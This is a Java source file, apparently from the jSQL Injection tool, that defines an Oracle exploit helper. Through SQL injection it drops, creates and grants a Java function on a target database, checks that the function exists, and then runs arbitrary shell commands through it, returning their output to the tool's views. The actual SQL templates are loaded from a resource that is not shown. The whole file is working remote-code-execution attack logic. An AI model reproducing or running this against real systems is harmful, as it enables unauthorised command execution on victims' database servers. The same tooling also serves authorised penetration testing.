1 package com.jsql.model.accessible.vendor;
2
3 import com.jsql.model.InjectionModel;
4 import com.jsql.model.accessible.ExploitMode;
5 import com.jsql.model.accessible.ResourceAccess;
6 import com.jsql.model.accessible.vendor.oracle.ModelYamlOracle;
7 import com.jsql.model.bean.util.Interaction;
8 import com.jsql.model.bean.util.Request;
9 import com.jsql.model.exception.JSqlException;
10 import com.jsql.model.injection.vendor.model.VendorYaml;
11 import com.jsql.util.LogLevelUtil;
12 import org.apache.commons.lang3.StringUtils;
13 import org.apache.logging.log4j.LogManager;
14 import org.apache.logging.log4j.Logger;
15 import org.yaml.snakeyaml.Yaml;
16
17 import java.util.Arrays;
18 import java.util.UUID;
19
/**
 * Oracle-specific exploit helper built on top of an {@link InjectionModel}.
 *
 * <p>The statement templates come from the vendor model's "exploit" YAML resource,
 * bound to a {@link ModelYamlOracle}. {@link #createRce(ExploitMode)} fills those
 * templates with two fixed object names and sends them through the injection model;
 * {@link #runRceCmd(String, UUID)} then formats a command into the "run" template and
 * returns the text the injection yields.
 *
 * <p>This class contains no step that removes the two objects after use: the drop
 * statements are only issued at the start of {@code createRce}.
 */
public class ExploitOracle {

    // Names substituted into the drop/add/confirm/run templates. They are compile-time
    // constants, so they never vary between runs; presumably they are the names under
    // which the objects exist in the target schema (templates not visible here), which
    // would make them a stable artifact when auditing a database.
    private static final String RCE_JAVA_UTIL_SRC = "RCE_JAVA_UTIL_SRC";
    private static final String RCE_JAVA_UTIL_FUNC = "RCE_JAVA_UTIL_FUNC";

    private static final Logger LOGGER = LogManager.getRootLogger();

    private final InjectionModel injectionModel;
    private final ModelYamlOracle modelYaml;

    /**
     * Binds the Oracle exploit templates of the given model to a {@link ModelYamlOracle}.
     *
     * @param injectionModel model used for every injection and view notification
     */
    public ExploitOracle(InjectionModel injectionModel) {
        this.injectionModel = injectionModel;
        var exploitTemplates = injectionModel.getMediatorVendor().getOracle().instance()
            .getModelYaml().getResource().getExploit();
        // NOTE(review): typed SnakeYAML loading is only safe on trusted text; the input
        // here is the vendor model's own resource, confirm it can never be user-supplied.
        this.modelYaml = new Yaml().loadAs(exploitTemplates, ModelYamlOracle.class);
    }

    /**
     * Issues the drop, add, grant and confirm statements in that order, then tells the
     * views to open the Oracle RCE tab when the confirmation result contains the
     * function name.
     *
     * @param exploitMode requested mode; any value other than {@code AUTO} or
     *                    {@code QUERY_BODY} is only logged and the same sequence runs
     * @throws JSqlException propagated from the injection calls
     */
    public void createRce(ExploitMode exploitMode) throws JSqlException {
        var supportedModes = Arrays.asList(ExploitMode.AUTO, ExploitMode.QUERY_BODY);
        if (!supportedModes.contains(exploitMode)) {
            LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Exploit method not implemented, using query body instead");
        }

        var dropSource = String.format(this.modelYaml.getUdf().getDropSource(), RCE_JAVA_UTIL_SRC);
        this.injectionModel.injectWithoutIndex(dropSource, "body#drop-src");

        // NOTE(review): this call drops the function yet reuses the "body#drop-src" label;
        // looks like a copy-paste, confirm whether a distinct label was intended.
        var dropFunc = String.format(this.modelYaml.getUdf().getDropFunc(), RCE_JAVA_UTIL_FUNC);
        this.injectionModel.injectWithoutIndex(dropFunc, "body#drop-src");

        // The add-source template takes the source name twice.
        var addSource = String.format(
            this.modelYaml.getUdf().getAddSource(),
            RCE_JAVA_UTIL_SRC,
            RCE_JAVA_UTIL_SRC
        );
        this.injectionModel.injectWithoutIndex(addSource, "body#add-src");

        var addFunc = String.format(
            this.modelYaml.getUdf().getAddFunc(),
            RCE_JAVA_UTIL_FUNC,
            RCE_JAVA_UTIL_SRC
        );
        this.injectionModel.injectWithoutIndex(addFunc, ResourceAccess.ADD_FUNC);

        this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getGrant(), "body#grant-exec");

        var resourceAccess = this.injectionModel.getResourceAccess();
        var confirmQuery = String.format(
            this.modelYaml.getUdf().getConfirm(),
            VendorYaml.TRAIL_SQL,
            RCE_JAVA_UTIL_FUNC
        );
        var confirmation = resourceAccess.getResult(confirmQuery, ResourceAccess.BODY_CONFIRM);

        // Success is decided purely by the function name appearing in the returned text.
        boolean functionFound = confirmation.contains(RCE_JAVA_UTIL_FUNC);
        if (!functionFound) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "RCE failure: java function not found");
            return;
        }
        LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE successful: java function found");

        var openTab = new Request();
        openTab.setMessage(Interaction.ADD_TAB_EXPLOIT_RCE_ORACLE);
        openTab.setParameters(null, null);
        this.injectionModel.sendToViews(openTab);
    }

    /**
     * Formats {@code command} into the run template, fetches the result through the
     * injection model and forwards it to the views together with the shell id.
     *
     * <p>The only rewriting applied to {@code command} is replacing each space with
     * {@code %20}; no other character is escaped in this method. A {@link JSqlException}
     * is not rethrown: its message and the command are rendered with
     * {@code ResourceAccess.TEMPLATE_ERROR} and returned as the result.
     *
     * @param command   command text to place in the template
     * @param uuidShell identifier passed to the views alongside the result
     * @return the fetched text, or the formatted error text on {@link JSqlException}
     */
    public String runRceCmd(String command, UUID uuidShell) {
        String output;
        try {
            var resourceAccess = this.injectionModel.getResourceAccess();
            var runQuery = String.format(
                this.modelYaml.getUdf().getRunCmd(),
                RCE_JAVA_UTIL_FUNC,
                command.replace(StringUtils.SPACE, "%20"),
                VendorYaml.TRAIL_SQL
            );
            output = resourceAccess.getResult(runQuery, ResourceAccess.UDF_RUN_CMD);
        } catch (JSqlException e) {
            output = String.format(ResourceAccess.TEMPLATE_ERROR, e.getMessage(), command);
        }

        var resultNotice = new Request();
        resultNotice.setMessage(Interaction.GET_EXPLOIT_RCE_RESULT);
        resultNotice.setParameters(uuidShell, output);
        this.injectionModel.sendToViews(resultNotice);
        return output;
    }
}